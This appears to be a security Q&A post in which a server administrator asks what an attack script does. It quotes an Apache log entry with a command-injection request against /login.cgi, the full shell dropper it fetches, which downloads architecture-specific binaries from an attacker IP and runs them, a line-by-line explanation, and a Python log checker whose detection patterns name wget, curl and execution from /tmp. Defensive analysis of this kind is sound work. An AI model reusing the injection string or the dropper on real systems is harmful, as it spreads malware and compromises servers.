What does this bash script do? [Hack Attempt]
I've been noticing the following strange lines in my server's Apache logs lately:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.
But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?
Anyway, here it is:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
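As an added example (not code from the question or either answer), here is a small Python checker for the kind of Apache log line quoted above: it percent-decodes the request target, flags the command-separator plus download-and-execute pattern, and collects the client addresses a Fail2Ban filter would ban. The regexes and the benign sample lines are my own constructions; only the first sample entry is the line from the question.

```python
import re
from urllib.parse import unquote, urlsplit

# One Apache "combined" log entry: client IP, identity, user, timestamp, request line,
# status, size, referer, user agent. Only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Traits of the dropper request quoted in the question, checked on the
# percent-decoded request target so that URL encoding cannot hide them.
SHELL_SEP = re.compile(r"[;|&`]|\$\(")            # command separators / substitution
FETCH_TOOL = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
RUN_TMP = re.compile(r"\b(sh|bash|chmod)\b[^;|&]*?/(tmp|var|dev/shm)/")

def classify(line: str):
    """Parse one log line and return (ip, path, reasons); reasons is empty for a
    benign request, and None is returned if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    decoded = unquote(target)
    reasons = []
    if SHELL_SEP.search(decoded) and FETCH_TOOL.search(decoded):
        reasons.append("command separator plus download tool in request")
    if RUN_TMP.search(decoded):
        reasons.append("executes or chmods a file under a world-writable directory")
    return m.group("ip"), parts.path, reasons

def suspicious_clients(lines):
    """Return {ip: set(paths)} for every line that tripped at least one rule;
    this is the data a Fail2Ban filter or firewall rule would act on."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[2]:
            ip, path, _ = result
            hits.setdefault(ip, set()).add(path)
    return hits

# Constructed sample: the first entry is the request quoted in the question,
# the others are ordinary traffic that must not be flagged (addresses are documentation ranges).
SAMPLE_LOG = [
    '156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"',
    '203.0.113.7 - - [08/Sep/2018:04:30:01 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Sep/2018:04:30:02 +0200] "GET /search?q=wget%20manual HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]
```

Calling `suspicious_clients(SAMPLE_LOG)` yields only the first client with path `/login.cgi`; the page mentioning `wget` in a search query is not flagged because no command separator accompanies it.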
Solution 1:
Line by line:
#!/bin/sh
Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.
u="asgknskjdgn"
Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
Enumerates several common CPU architectures.
http_server="80.211.173.159"
http_port=80
The server which has the exploit.
cd /tmp/||cd /var/
Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.
for name in $bin_names
do
For each CPU architecture…
rm -rf $u
Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.
cp $SHELL $u
Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.
chmod 777 $u
Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.
>$u
Empties out the file. Pointless because of the next line.
wget http://$http_server:$http_port/$name -O -> $u
Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output), which is equivalent to -O $u.
./$u $name
Runs the exploit script with the architecture as the first argument.
done
Ends the loop.
It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard-coded rather than dynamically served; the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.
Solution 2:
The wget is the key dangerous line.
The for name in $bin_names is working through the list of platforms, and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.
It then downloads a file using wget and then executes it using the shell program it just copied over.
The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.